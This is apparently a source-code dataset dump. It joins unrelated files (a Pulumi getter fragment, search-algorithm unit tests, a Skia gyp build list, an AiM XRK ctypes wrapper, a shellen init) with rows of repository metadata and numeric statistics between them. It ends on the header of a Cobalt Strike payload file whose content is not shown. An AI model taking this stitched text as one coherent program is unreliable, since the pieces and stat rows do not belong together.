        Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
        """
        return pulumi.get(self, "schedule")

    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
        """
        return pulumi.get(self, "type")
| 43.650794
| 202
| 0.641091
| 2,434
| 22,000
| 5.641331
| 0.079704
| 0.096934
| 0.068313
| 0.062486
| 0.861408
| 0.840798
| 0.824922
| 0.809118
| 0.802491
| 0.795791
| 0
| 0.008645
| 0.253364
| 22,000
| 503
| 203
| 43.737575
| 0.827286
| 0.367636
| 0
| 0.746212
| 1
| 0
| 0.106693
| 0.047888
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159091
| false
| 0.003788
| 0.026515
| 0
| 0.280303
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
32cea390f719e0fc1fb072dedd04f1cd57ca0f19
| 7,397
|
py
|
Python
|
Testing/test_Searching.py
|
Yarintop/Data-Structures-And-Algorithms-In-Python
|
55db9e7f39211c42988171d51ef2659041df1aa1
|
[
"MIT"
] | null | null | null |
Testing/test_Searching.py
|
Yarintop/Data-Structures-And-Algorithms-In-Python
|
55db9e7f39211c42988171d51ef2659041df1aa1
|
[
"MIT"
] | null | null | null |
Testing/test_Searching.py
|
Yarintop/Data-Structures-And-Algorithms-In-Python
|
55db9e7f39211c42988171d51ef2659041df1aa1
|
[
"MIT"
] | null | null | null |
import unittest
import random
from Algorithms.Searching.LinearSearch import LinearSearch
from Algorithms.Searching.BinarySearch import BinarySearch
from Algorithms.Searching.JumpSearch import JumpSearch
from Algorithms.Searching.ExponentialSearch import ExponentialSearch
from Algorithms.Searching.TernarySearch import TernarySearch
from Algorithms.Searching.JumpSearch import JumpSearch
from Algorithms.Searching.FibonacciSearch import FibonacciSearch
class TestSearching(unittest.TestCase):
    """Shared tests for every searching algorithm.

    Every positive test checks ``self.arr[returned_index] == self.arr[expected_index]``
    instead of comparing indices directly: the random array may contain
    duplicates, so any index holding the target value is a correct answer.
    """

    # (search callable, human-readable label) for every algorithm under test.
    # Fix: JumpSearch used to appear twice, so it was asserted twice per test.
    SEARCHERS = [
        (LinearSearch.linearSearch, "Linear Search"),
        (BinarySearch.binarySearch, "Binary Search"),
        (JumpSearch.jumpSearch, "Jump Search"),
        (ExponentialSearch.exponentialSearch, "Exponential Search"),
        (TernarySearch.ternarySearch, "Ternary Search"),
        (FibonacciSearch.fibonacciSearch, "Fibonacci Search"),
    ]

    def __init__(self, methodName: str = "runTest") -> None:
        # Bug fix: the default used to be the Ellipsis literal ``...``, which
        # crashes unittest if the class is instantiated without an explicit
        # method name.  "runTest" is TestCase's documented default.
        super().__init__(methodName=methodName)
        # 20 random values in [-100, 100], sorted as the search algorithms require.
        self.arr = sorted(random.randint(-100, 100) for _ in range(20))

    def _check_found(self, index: int) -> None:
        """Assert every algorithm locates the value stored at ``index``."""
        target = self.arr[index]
        for search, label in self.SEARCHERS:
            # Fix: messages used to be copy-pasted ("test_last_value - Linear
            # Search") regardless of the test or algorithm that failed.
            self.assertEqual(self.arr[search(self.arr, target)], target,
                             f"lookup of arr[{index}] failed - {label}")

    def _check_not_found(self, value: int) -> None:
        """Assert every algorithm returns -1 for a value not in the array."""
        for search, label in self.SEARCHERS:
            self.assertEqual(search(self.arr, value), -1,
                             f"missing value {value} should yield -1 - {label}")

    def test_first_value(self):
        self._check_found(0)

    def test_last_value(self):
        self._check_found(len(self.arr) - 1)

    def test_first_third_value(self):
        self._check_found(len(self.arr) // 3)

    def test_second_third_value(self):
        self._check_found(2 * len(self.arr) // 3)

    def test_not_in_arr_lower(self):
        # -500 is below the generated range [-100, 100].
        self._check_not_found(-500)

    def test_not_in_arr_higher(self):
        # 500 is above the generated range [-100, 100].
        self._check_not_found(500)
| 94.833333
| 184
| 0.712586
| 1,039
| 7,397
| 4.940327
| 0.076997
| 0.235924
| 0.081824
| 0.120008
| 0.872394
| 0.870251
| 0.870251
| 0.854276
| 0.854276
| 0.815508
| 0
| 0.020983
| 0.136677
| 7,397
| 78
| 185
| 94.833333
| 0.782806
| 0.029877
| 0
| 0.125
| 0
| 0
| 0.196682
| 0.041957
| 0
| 0
| 0
| 0
| 0.65625
| 1
| 0.109375
| false
| 0
| 0.140625
| 0
| 0.265625
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
32e0a7273a06f60e0d330fe4f0b4ea4ce6f07d71
| 9,419
|
gyp
|
Python
|
gyp/animator.gyp
|
Shouqun/node-skia
|
d2f6bf4443ac8f733f18ed9e80b0295b88c031b9
|
[
"MIT"
] | 20
|
2015-03-15T22:42:36.000Z
|
2021-04-28T21:34:05.000Z
|
gyp/animator.gyp
|
Shouqun/node-skia
|
d2f6bf4443ac8f733f18ed9e80b0295b88c031b9
|
[
"MIT"
] | 1
|
2017-01-19T05:40:33.000Z
|
2017-01-19T05:40:33.000Z
|
gyp/animator.gyp
|
Shouqun/node-skia
|
d2f6bf4443ac8f733f18ed9e80b0295b88c031b9
|
[
"MIT"
] | null | null | null |
# Animator is basically Skia's (much saner) version of Flash.
# On top of Views it provides a declarative UI model that can be updated
# in response to events, which trigger changes or run scripts.
{
'includes': [
'common.gypi',
],
'targets': [
{
'target_name': 'animator',
'type': 'static_library',
'include_dirs': [
'../deps/skia/include/config',
'../deps/skia/include/core',
'../deps/skia/include/effects',
'../deps/skia/include/animator',
'../deps/skia/include/views',
'../deps/skia/include/xml',
'../deps/skia/include/utils',
'../deps/skia/include/images',
'../deps/skia/src/utils',
],
'sources': [
'../deps/skia/include/animator/SkAnimator.h',
'../deps/skia/include/animator/SkAnimatorView.h',
'../deps/skia/src/animator/SkAnimate.h',
'../deps/skia/src/animator/SkAnimateActive.cpp',
'../deps/skia/src/animator/SkAnimateActive.h',
'../deps/skia/src/animator/SkAnimateBase.cpp',
'../deps/skia/src/animator/SkAnimateBase.h',
'../deps/skia/src/animator/SkAnimateField.cpp',
'../deps/skia/src/animator/SkAnimateMaker.cpp',
'../deps/skia/src/animator/SkAnimateMaker.h',
'../deps/skia/src/animator/SkAnimateProperties.h',
'../deps/skia/src/animator/SkAnimateSet.cpp',
'../deps/skia/src/animator/SkAnimateSet.h',
'../deps/skia/src/animator/SkAnimator.cpp',
'../deps/skia/src/animator/SkAnimatorScript.cpp',
'../deps/skia/src/animator/SkAnimatorScript.h',
#'../deps/skia/src/animator/SkAnimatorScript2.cpp', fails on windows
#'../deps/skia/src/animator/SkAnimatorScript2.h',
'../deps/skia/src/animator/SkBoundable.cpp',
'../deps/skia/src/animator/SkBoundable.h',
'../deps/skia/src/animator/SkBuildCondensedInfo.cpp',
#'../deps/skia/src/animator/SkCondensedDebug.cpp', fails on windows
#'../deps/skia/src/animator/SkCondensedRelease.cpp',
'../deps/skia/src/animator/SkDisplayable.cpp',
'../deps/skia/src/animator/SkDisplayable.h',
'../deps/skia/src/animator/SkDisplayAdd.cpp',
'../deps/skia/src/animator/SkDisplayAdd.h',
'../deps/skia/src/animator/SkDisplayApply.cpp',
'../deps/skia/src/animator/SkDisplayApply.h',
'../deps/skia/src/animator/SkDisplayBounds.cpp',
'../deps/skia/src/animator/SkDisplayBounds.h',
'../deps/skia/src/animator/SkDisplayEvent.cpp',
'../deps/skia/src/animator/SkDisplayEvent.h',
'../deps/skia/src/animator/SkDisplayEvents.cpp',
'../deps/skia/src/animator/SkDisplayEvents.h',
'../deps/skia/src/animator/SkDisplayInclude.cpp',
'../deps/skia/src/animator/SkDisplayInclude.h',
'../deps/skia/src/animator/SkDisplayInput.cpp',
'../deps/skia/src/animator/SkDisplayInput.h',
'../deps/skia/src/animator/SkDisplayList.cpp',
'../deps/skia/src/animator/SkDisplayList.h',
'../deps/skia/src/animator/SkDisplayMath.cpp',
'../deps/skia/src/animator/SkDisplayMath.h',
'../deps/skia/src/animator/SkDisplayMovie.cpp',
'../deps/skia/src/animator/SkDisplayMovie.h',
'../deps/skia/src/animator/SkDisplayNumber.cpp',
'../deps/skia/src/animator/SkDisplayNumber.h',
'../deps/skia/src/animator/SkDisplayPost.cpp',
'../deps/skia/src/animator/SkDisplayPost.h',
'../deps/skia/src/animator/SkDisplayRandom.cpp',
'../deps/skia/src/animator/SkDisplayRandom.h',
'../deps/skia/src/animator/SkDisplayScreenplay.cpp',
'../deps/skia/src/animator/SkDisplayScreenplay.h',
'../deps/skia/src/animator/SkDisplayType.cpp',
'../deps/skia/src/animator/SkDisplayType.h',
'../deps/skia/src/animator/SkDisplayTypes.cpp',
'../deps/skia/src/animator/SkDisplayTypes.h',
'../deps/skia/src/animator/SkDisplayXMLParser.cpp',
'../deps/skia/src/animator/SkDisplayXMLParser.h',
'../deps/skia/src/animator/SkDraw3D.cpp',
'../deps/skia/src/animator/SkDraw3D.h',
'../deps/skia/src/animator/SkDrawable.cpp',
'../deps/skia/src/animator/SkDrawable.h',
'../deps/skia/src/animator/SkDrawBitmap.cpp',
'../deps/skia/src/animator/SkDrawBitmap.h',
'../deps/skia/src/animator/SkDrawBlur.cpp',
'../deps/skia/src/animator/SkDrawBlur.h',
'../deps/skia/src/animator/SkDrawClip.cpp',
'../deps/skia/src/animator/SkDrawClip.h',
'../deps/skia/src/animator/SkDrawColor.cpp',
'../deps/skia/src/animator/SkDrawColor.h',
'../deps/skia/src/animator/SkDrawDash.cpp',
'../deps/skia/src/animator/SkDrawDash.h',
'../deps/skia/src/animator/SkDrawDiscrete.cpp',
'../deps/skia/src/animator/SkDrawDiscrete.h',
'../deps/skia/src/animator/SkDrawEmboss.cpp',
'../deps/skia/src/animator/SkDrawEmboss.h',
'../deps/skia/src/animator/SkDrawExtraPathEffect.cpp',
'../deps/skia/src/animator/SkDrawFull.cpp',
'../deps/skia/src/animator/SkDrawFull.h',
'../deps/skia/src/animator/SkDrawGradient.cpp',
'../deps/skia/src/animator/SkDrawGradient.h',
'../deps/skia/src/animator/SkDrawGroup.cpp',
'../deps/skia/src/animator/SkDrawGroup.h',
'../deps/skia/src/animator/SkDrawLine.cpp',
'../deps/skia/src/animator/SkDrawLine.h',
'../deps/skia/src/animator/SkDrawMatrix.cpp',
'../deps/skia/src/animator/SkDrawMatrix.h',
'../deps/skia/src/animator/SkDrawOval.cpp',
'../deps/skia/src/animator/SkDrawOval.h',
'../deps/skia/src/animator/SkDrawPaint.cpp',
'../deps/skia/src/animator/SkDrawPaint.h',
'../deps/skia/src/animator/SkDrawPath.cpp',
'../deps/skia/src/animator/SkDrawPath.h',
'../deps/skia/src/animator/SkDrawPoint.cpp',
'../deps/skia/src/animator/SkDrawPoint.h',
'../deps/skia/src/animator/SkDrawRectangle.cpp',
'../deps/skia/src/animator/SkDrawRectangle.h',
'../deps/skia/src/animator/SkDrawSaveLayer.cpp',
'../deps/skia/src/animator/SkDrawSaveLayer.h',
'../deps/skia/src/animator/SkDrawShader.cpp',
'../deps/skia/src/animator/SkDrawShader.h',
'../deps/skia/src/animator/SkDrawText.cpp',
'../deps/skia/src/animator/SkDrawText.h',
'../deps/skia/src/animator/SkDrawTextBox.cpp',
'../deps/skia/src/animator/SkDrawTextBox.h',
'../deps/skia/src/animator/SkDrawTo.cpp',
'../deps/skia/src/animator/SkDrawTo.h',
'../deps/skia/src/animator/SkDrawTransparentShader.cpp',
'../deps/skia/src/animator/SkDrawTransparentShader.h',
'../deps/skia/src/animator/SkDump.cpp',
'../deps/skia/src/animator/SkDump.h',
'../deps/skia/src/animator/SkExtras.h',
'../deps/skia/src/animator/SkGetCondensedInfo.cpp',
'../deps/skia/src/animator/SkHitClear.cpp',
'../deps/skia/src/animator/SkHitClear.h',
'../deps/skia/src/animator/SkHitTest.cpp',
'../deps/skia/src/animator/SkHitTest.h',
'../deps/skia/src/animator/SkIntArray.h',
'../deps/skia/src/animator/SkMatrixParts.cpp',
'../deps/skia/src/animator/SkMatrixParts.h',
'../deps/skia/src/animator/SkMemberInfo.cpp',
'../deps/skia/src/animator/SkMemberInfo.h',
'../deps/skia/src/animator/SkOpArray.cpp',
'../deps/skia/src/animator/SkOpArray.h',
'../deps/skia/src/animator/SkOperand.h',
'../deps/skia/src/animator/SkOperand2.h',
'../deps/skia/src/animator/SkOperandInterpolator.h',
'../deps/skia/src/animator/SkOperandIterpolator.cpp',
'../deps/skia/src/animator/SkPaintParts.cpp',
'../deps/skia/src/animator/SkPaintParts.h',
'../deps/skia/src/animator/SkParseSVGPath.cpp',
'../deps/skia/src/animator/SkPathParts.cpp',
'../deps/skia/src/animator/SkPathParts.h',
'../deps/skia/src/animator/SkPostParts.cpp',
'../deps/skia/src/animator/SkPostParts.h',
'../deps/skia/src/animator/SkScript.cpp',
'../deps/skia/src/animator/SkScript.h',
'../deps/skia/src/animator/SkScript2.h',
'../deps/skia/src/animator/SkScriptCallBack.h',
'../deps/skia/src/animator/SkScriptDecompile.cpp',
'../deps/skia/src/animator/SkScriptRuntime.cpp',
'../deps/skia/src/animator/SkScriptRuntime.h',
'../deps/skia/src/animator/SkScriptTokenizer.cpp',
'../deps/skia/src/animator/SkSnapshot.cpp',
'../deps/skia/src/animator/SkSnapshot.h',
'../deps/skia/src/animator/SkTDArray_Experimental.h',
'../deps/skia/src/animator/SkTextOnPath.cpp',
'../deps/skia/src/animator/SkTextOnPath.h',
'../deps/skia/src/animator/SkTextToPath.cpp',
'../deps/skia/src/animator/SkTextToPath.h',
'../deps/skia/src/animator/SkTime.cpp',
'../deps/skia/src/animator/SkTypedArray.cpp',
'../deps/skia/src/animator/SkTypedArray.h',
'../deps/skia/src/animator/SkXMLAnimatorWriter.cpp',
'../deps/skia/src/animator/SkXMLAnimatorWriter.h',
],
'direct_dependent_settings': {
'include_dirs': [
'../deps/skia/include/animator',
],
},
},
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
| 47.812183
| 76
| 0.622784
| 1,050
| 9,419
| 5.58
| 0.153333
| 0.22666
| 0.291005
| 0.499403
| 0.849633
| 0.129374
| 0.012289
| 0.012289
| 0
| 0
| 0
| 0.00116
| 0.176452
| 9,419
| 196
| 77
| 48.056122
| 0.754158
| 0.05404
| 0
| 0.049724
| 0
| 0
| 0.757249
| 0.746685
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b5be0f998b9e90fdbadd854a281ac49e949340f1
| 16,276
|
py
|
Python
|
xrk.py
|
briguy-official/xrk
|
9acd44bd457d02f837cd4eb2611effb87a351e7a
|
[
"MIT"
] | null | null | null |
xrk.py
|
briguy-official/xrk
|
9acd44bd457d02f837cd4eb2611effb87a351e7a
|
[
"MIT"
] | 1
|
2020-07-14T09:27:54.000Z
|
2020-07-14T09:27:54.000Z
|
xrk.py
|
briguy-official/xrk
|
9acd44bd457d02f837cd4eb2611effb87a351e7a
|
[
"MIT"
] | 1
|
2022-01-19T06:27:08.000Z
|
2022-01-19T06:27:08.000Z
|
# AIM XRK Wrapper Class
# Brian Acosta
# May 16th, 2018
#
#
# Distributed under creative commons beerware license:
# Free, but if you use it and we ever meet you buy me a beer.
#
from ctypes import *
import os
from xrk_util import *
class XRK():
    """Wrapper around the AiM ``aimXRK`` native library for reading .xrk
    data-logger files.

    Exposes session metadata (vehicle, track, racer, championship, venue),
    lap timing, and the three channel families the native library
    distinguishes: regular data channels, GPS channels, and raw GPS
    channels.  Channel name lists are cached on construction as
    ``self.channels``, ``self.GPS_channels`` and ``self.GPS_raw_channels``.
    """

    def __init__(self, filename):
        """Open *filename* with the native library and cache channel lists.

        Raises:
            IOError: if the native library fails to open the file.
        """
        self.filename = filename
        self.fileptr = file_pointer(self.filename)
        self.idxf = aimXRK.open_file(self.fileptr.value)
        # Fail fast on a bad handle.  The original code built the channel
        # lists first (calling the library with an invalid handle) and then
        # executed ``del self``, which only unbinds the local name and never
        # prevents a broken instance from being returned to the caller.
        if not self.idxf > 0:
            raise IOError("aimXRK could not open file: %s" % filename)
        self.channels = self.channel_list()
        self.GPS_channels = self.GPS_channel_list()
        self.GPS_raw_channels = self.GPS_raw_channel_list()

    def close(self):
        """Close the native file handle; returns True on success."""
        success = aimXRK.close_file_i(self.idxf)
        return (success > 0)

    ############################################################################
    ## INTERNAL HELPER
    ############################################################################
    def _read_samples(self, sampler, sample_count, *indices):
        """Call native *sampler* and return ``[times, samples]`` lists.

        *sampler* is one of the ``aimXRK.get_*_samples`` functions; *indices*
        are the integer arguments it takes between the file handle and the
        output buffers (the channel index, optionally preceded by the
        zero-based lap index).  Shared by every ``*_times_and_samples``
        method below, which previously each repeated this body verbatim.
        """
        timeptr = (c_double * sample_count)()
        sampleptr = (c_double * sample_count)()
        sampler(self.idxf, *indices, byref(timeptr), byref(sampleptr),
                sample_count)
        return [list(timeptr), list(sampleptr)]

    ############################################################################
    ## SESSION METADATA
    ############################################################################
    def vehicle_name(self):
        """Return a string of the vehicle name."""
        return c_char2Str(c_char_p(aimXRK.get_vehicle_name(self.idxf)))

    def track_name(self):
        """Return a string of the track name."""
        return c_char2Str(c_char_p(aimXRK.get_track_name(self.idxf)))

    def racer_name(self):
        """Return a string of the racer's name."""
        return c_char2Str(c_char_p(aimXRK.get_racer_name(self.idxf)))

    def championship_name(self):
        """Return a string of the championship name."""
        return c_char2Str(c_char_p(aimXRK.get_championship_name(self.idxf)))

    def venue_type(self):
        """Return a string of the venue type."""
        return c_char2Str(c_char_p(aimXRK.get_venue_type_name(self.idxf)))

    ############################################################################
    ## LAPS
    ############################################################################
    def lap_count(self):
        """Return an integer lap count."""
        return aimXRK.get_laps_count(self.idxf)

    def lap_times_list(self):
        """Return a list of the lap durations in the given run."""
        start = c_double(0)
        duration = c_double(0)
        lap_times = []
        for i in range(self.lap_count()):
            aimXRK.get_lap_info(self.idxf, i, byref(start), byref(duration))
            lap_times.append(duration.value)
        return lap_times

    ############################################################################
    ## REGULAR DATA CHANNEL METHODS
    ############################################################################
    def channel_count(self):
        """Return the number of regular data channels."""
        return aimXRK.get_channels_count(self.idxf)

    def channel_list(self):
        """Return the list of regular channel names."""
        return [c_char2Str(c_char_p(aimXRK.get_channel_name(self.idxf, i)))
                for i in range(self.channel_count())]

    def channel_sample_count(self, channel_name):
        """Sample count for *channel_name*; 0 if the name is unknown."""
        try:
            idxc = self.channels.index(channel_name)
        except ValueError:
            # Unknown channel name: mirror the library convention of
            # returning 0 rather than raising (the original bare ``except:``
            # also hid unrelated errors; only the lookup can fail here).
            return 0
        return aimXRK.get_channel_samples_count(self.idxf, idxc)

    def channel_sample_count_by_index(self, idxc):
        """Sample count for the channel at index *idxc*."""
        return aimXRK.get_channel_samples_count(self.idxf, idxc)

    def channel_units(self, channel_name):
        """Units string for *channel_name*; 0 if the name is unknown."""
        try:
            idxc = self.channels.index(channel_name)
        except ValueError:
            return 0
        return c_char2Str(c_char_p(aimXRK.get_channel_units(self.idxf, idxc)))

    def channel_units_by_index(self, idxc):
        """Units string for the channel at index *idxc*."""
        return c_char2Str(c_char_p(aimXRK.get_channel_units(self.idxf, idxc)))

    def channel_times_and_samples(self, channel_name):
        """``[times, samples]`` for *channel_name* (ValueError if unknown)."""
        return self.channel_times_and_samples_by_index(
            self.channels.index(channel_name))

    def channel_times_and_samples_by_index(self, idxc):
        """``[times, samples]`` for the channel at index *idxc*."""
        count = self.channel_sample_count_by_index(idxc)
        return self._read_samples(aimXRK.get_channel_samples, count, idxc)

    def lap_channel_sample_count(self, channel_name, lap_number):
        """Sample count of *channel_name* in 1-based *lap_number*; 0 if unknown."""
        try:
            idxc = self.channels.index(channel_name)
        except ValueError:
            return 0
        return aimXRK.get_lap_channel_samples_count(self.idxf,
                                                    lap_number - 1, idxc)

    def lap_channel_sample_count_by_index(self, idxc, lap_number):
        """Sample count of channel *idxc* in 1-based *lap_number*."""
        return aimXRK.get_lap_channel_samples_count(self.idxf,
                                                    lap_number - 1, idxc)

    def lap_channel_times_and_samples(self, channel_name, lap_number):
        """``[times, samples]`` of *channel_name* in 1-based *lap_number*."""
        return self.lap_channel_times_and_samples_by_index(
            self.channels.index(channel_name), lap_number)

    def lap_channel_times_and_samples_by_index(self, idxc, lap_number):
        """``[times, samples]`` of channel *idxc* in 1-based *lap_number*."""
        count = self.lap_channel_sample_count_by_index(idxc, lap_number)
        return self._read_samples(aimXRK.get_lap_channel_samples, count,
                                  lap_number - 1, idxc)

    ############################################################################
    ## GPS DATA CHANNEL METHODS
    ############################################################################
    def GPS_channel_count(self):
        """Return the number of GPS channels."""
        return aimXRK.get_GPS_channels_count(self.idxf)

    def GPS_channel_list(self):
        """Return the list of GPS channel names."""
        return [c_char2Str(c_char_p(aimXRK.get_GPS_channel_name(self.idxf, i)))
                for i in range(self.GPS_channel_count())]

    def GPS_channel_sample_count(self, channel_name):
        """Sample count for GPS *channel_name*; 0 if the name is unknown."""
        try:
            idxc = self.GPS_channels.index(channel_name)
        except ValueError:
            return 0
        return aimXRK.get_GPS_channel_samples_count(self.idxf, idxc)

    def GPS_channel_sample_count_by_index(self, idxc):
        """Sample count for the GPS channel at index *idxc*."""
        return aimXRK.get_GPS_channel_samples_count(self.idxf, idxc)

    def GPS_channel_units(self, channel_name):
        """Units string for GPS *channel_name*; 0 if the name is unknown."""
        try:
            idxc = self.GPS_channels.index(channel_name)
        except ValueError:
            return 0
        return c_char2Str(c_char_p(aimXRK.get_GPS_channel_units(self.idxf, idxc)))

    def GPS_channel_units_by_index(self, idxc):
        """Units string for the GPS channel at index *idxc*."""
        return c_char2Str(c_char_p(aimXRK.get_GPS_channel_units(self.idxf, idxc)))

    def GPS_channel_times_and_samples(self, channel_name):
        """``[times, samples]`` for GPS *channel_name* (ValueError if unknown)."""
        return self.GPS_channel_times_and_samples_by_index(
            self.GPS_channels.index(channel_name))

    def GPS_channel_times_and_samples_by_index(self, idxc):
        """``[times, samples]`` for the GPS channel at index *idxc*."""
        count = self.GPS_channel_sample_count_by_index(idxc)
        return self._read_samples(aimXRK.get_GPS_channel_samples, count, idxc)

    def GPS_lap_channel_sample_count(self, channel_name, lap_number):
        """Sample count of GPS *channel_name* in 1-based *lap_number*; 0 if unknown."""
        try:
            idxc = self.GPS_channels.index(channel_name)
        except ValueError:
            return 0
        return aimXRK.get_lap_GPS_channel_samples_count(self.idxf,
                                                        lap_number - 1, idxc)

    def GPS_lap_channel_sample_count_by_index(self, idxc, lap_number):
        """Sample count of GPS channel *idxc* in 1-based *lap_number*."""
        return aimXRK.get_lap_GPS_channel_samples_count(self.idxf,
                                                        lap_number - 1, idxc)

    def GPS_lap_channel_times_and_samples(self, channel_name, lap_number):
        """``[times, samples]`` of GPS *channel_name* in 1-based *lap_number*."""
        return self.GPS_lap_channel_times_and_samples_by_index(
            self.GPS_channels.index(channel_name), lap_number)

    def GPS_lap_channel_times_and_samples_by_index(self, idxc, lap_number):
        """``[times, samples]`` of GPS channel *idxc* in 1-based *lap_number*."""
        count = self.GPS_lap_channel_sample_count_by_index(idxc, lap_number)
        return self._read_samples(aimXRK.get_lap_GPS_channel_samples, count,
                                  lap_number - 1, idxc)

    ############################################################################
    ## RAW GPS DATA CHANNEL METHODS
    ############################################################################
    def GPS_raw_raw_channel_count(self):
        """Return the native 'raw raw' GPS channel count."""
        return aimXRK.get_GPS_raw_raw_channels_count(self.idxf)

    def GPS_raw_channel_count(self):
        """Return the number of raw GPS channels."""
        return aimXRK.get_GPS_raw_channels_count(self.idxf)

    def GPS_raw_channel_list(self):
        """Return the list of raw GPS channel names."""
        return [c_char2Str(c_char_p(aimXRK.get_GPS_raw_channel_name(self.idxf, i)))
                for i in range(self.GPS_raw_channel_count())]

    def GPS_raw_channel_sample_count(self, channel_name):
        """Sample count for raw GPS *channel_name*; 0 if the name is unknown."""
        try:
            idxc = self.GPS_raw_channels.index(channel_name)
        except ValueError:
            return 0
        return aimXRK.get_GPS_raw_channel_samples_count(self.idxf, idxc)

    def GPS_raw_channel_sample_count_by_index(self, idxc):
        """Sample count for the raw GPS channel at index *idxc*."""
        return aimXRK.get_GPS_raw_channel_samples_count(self.idxf, idxc)

    def GPS_raw_channel_units(self, channel_name):
        """Units string for raw GPS *channel_name*; 0 if the name is unknown."""
        try:
            idxc = self.GPS_raw_channels.index(channel_name)
        except ValueError:
            return 0
        return c_char2Str(c_char_p(aimXRK.get_GPS_raw_channel_units(self.idxf, idxc)))

    def GPS_raw_channel_units_by_index(self, idxc):
        """Units string for the raw GPS channel at index *idxc*."""
        return c_char2Str(c_char_p(aimXRK.get_GPS_raw_channel_units(self.idxf, idxc)))

    def GPS_raw_channel_times_and_samples(self, channel_name):
        """``[times, samples]`` for raw GPS *channel_name* (ValueError if unknown)."""
        return self.GPS_raw_channel_times_and_samples_by_index(
            self.GPS_raw_channels.index(channel_name))

    def GPS_raw_channel_times_and_samples_by_index(self, idxc):
        """``[times, samples]`` for the raw GPS channel at index *idxc*."""
        count = self.GPS_raw_channel_sample_count_by_index(idxc)
        return self._read_samples(aimXRK.get_GPS_raw_channel_samples, count,
                                  idxc)

    def GPS_raw_lap_channel_sample_count(self, channel_name, lap_number):
        """Sample count of raw GPS *channel_name* in 1-based *lap_number*; 0 if unknown."""
        try:
            idxc = self.GPS_raw_channels.index(channel_name)
        except ValueError:
            return 0
        return aimXRK.get_lap_GPS_raw_channel_samples_count(self.idxf,
                                                            lap_number - 1,
                                                            idxc)

    def GPS_raw_lap_channel_sample_count_by_index(self, idxc, lap_number):
        """Sample count of raw GPS channel *idxc* in 1-based *lap_number*."""
        return aimXRK.get_lap_GPS_raw_channel_samples_count(self.idxf,
                                                            lap_number - 1,
                                                            idxc)

    def GPS_raw_lap_channel_times_and_samples(self, channel_name, lap_number):
        """``[times, samples]`` of raw GPS *channel_name* in 1-based *lap_number*."""
        return self.GPS_raw_lap_channel_times_and_samples_by_index(
            self.GPS_raw_channels.index(channel_name), lap_number)

    def GPS_raw_lap_channel_times_and_samples_by_index(self, idxc, lap_number):
        """``[times, samples]`` of raw GPS channel *idxc* in 1-based *lap_number*."""
        count = self.GPS_raw_lap_channel_sample_count_by_index(idxc, lap_number)
        return self._read_samples(aimXRK.get_lap_GPS_raw_channel_samples,
                                  count, lap_number - 1, idxc)
| 38.56872
| 97
| 0.571946
| 1,866
| 16,276
| 4.648982
| 0.05895
| 0.106513
| 0.049798
| 0.049798
| 0.884957
| 0.877233
| 0.863631
| 0.854525
| 0.830202
| 0.793314
| 0
| 0.004075
| 0.321578
| 16,276
| 422
| 98
| 38.56872
| 0.781561
| 0.031887
| 0
| 0.712375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.010033
| 0.053512
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd2fa74f9ba51d08437e66e84e5cde0152ba524b
| 106
|
py
|
Python
|
shellen/__init__.py
|
f0rki/shellen
|
46f81de9b180931cc5e438b1dda7ab2a623b2087
|
[
"MIT"
] | 882
|
2017-11-29T20:42:58.000Z
|
2022-03-12T08:18:57.000Z
|
shellen/__init__.py
|
f0rki/shellen
|
46f81de9b180931cc5e438b1dda7ab2a623b2087
|
[
"MIT"
] | 21
|
2017-12-01T05:30:39.000Z
|
2020-12-15T11:14:44.000Z
|
shellen/__init__.py
|
f0rki/shellen
|
46f81de9b180931cc5e438b1dda7ab2a623b2087
|
[
"MIT"
] | 104
|
2018-01-20T07:12:31.000Z
|
2022-03-12T08:18:59.000Z
|
import os
import sys

# Make this package's sibling modules importable by bare name: append the
# directory containing this file to the module search path.
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
| 26.5
| 84
| 0.773585
| 19
| 106
| 4.105263
| 0.473684
| 0.230769
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056604
| 106
| 4
| 84
| 26.5
| 0.78
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1fc263f8231e3b4ac5fef9c6c103abfb53893931
| 3,229
|
py
|
Python
|
CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py
|
Tokisaki-Galaxy/BadUSB
|
